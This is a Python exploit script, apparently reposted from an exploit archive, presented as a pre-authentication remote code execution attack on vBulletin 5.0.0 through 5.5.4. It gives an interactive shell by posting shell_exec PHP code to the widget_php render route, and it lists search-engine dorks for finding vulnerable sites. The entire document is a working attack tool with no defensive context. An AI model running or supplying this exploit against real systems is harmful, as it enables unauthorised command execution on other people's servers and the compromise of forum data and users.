Share
#!/usr/bin/python  
#  
# vBulletin 5.x 0day pre-auth RCE exploit  
#  
# This should work on all versions from 5.0.0 till 5.5.4  
#  
# Google Dorks:  
# - site:*.vbulletin.net  
# - "Powered by vBulletin Version 5.5.4"  
  
import requests  
import sys  
  
if len(sys.argv) != 2:  
sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])  
  
params = {"routestring":"ajax/render/widget_php"}  
  
while True:  
try:  
cmd = raw_input("vBulletin$ ")  
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"  
r = requests.post(url = sys.argv[1], data = params)  
if r.status_code == 200:  
print r.text  
else:  
sys.exit("Exploit failed! :(")  
except KeyboardInterrupt:  
sys.exit("\nClosing shell...")  
except Exception, e:  
sys.exit(str(e))